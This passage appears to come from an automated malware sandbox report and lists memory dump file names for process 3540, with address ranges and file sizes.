          Filesize

          600KB

        • memory/3540-9-0x00000000749A0000-0x0000000075150000-memory.dmp

          Filesize

          7.7MB

        • memory/3540-33-0x0000000008050000-0x00000000085F4000-memory.dmp

          Filesize

          5.6MB

        • memory/3540-32-0x0000000006D70000-0x0000000006D92000-memory.dmp

          Filesize

          136KB

        • memory/3540-31-0x0000000006CF0000-0x0000000006D0A000-memory.dmp

          Filesize

          104KB

        • memory/3540-11-0x00000000031F0000-0x0000000003226000-memory.dmp

          Filesize

          216KB

        • memory/3540-10-0x00000000053A0000-0x00000000053B0000-memory.dmp

          Filesize

          64KB

        • memory/3540-29-0x00000000053A0000-0x00000000053B0000-memory.dmp

          Filesize

          64KB

        • memory/3540-28-0x0000000006850000-0x000000000689C000-memory.dmp

          Filesize

          304KB

        • memory/3540-27-0x0000000006810000-0x000000000682E000-memory.dmp

          Filesize

          120KB

        • memory/3540-26-0x0000000006220000-0x0000000006574000-memory.dmp

          Filesize

          3.3MB

        • memory/3540-15-0x0000000006140000-0x00000000061A6000-memory.dmp

          Filesize

          408KB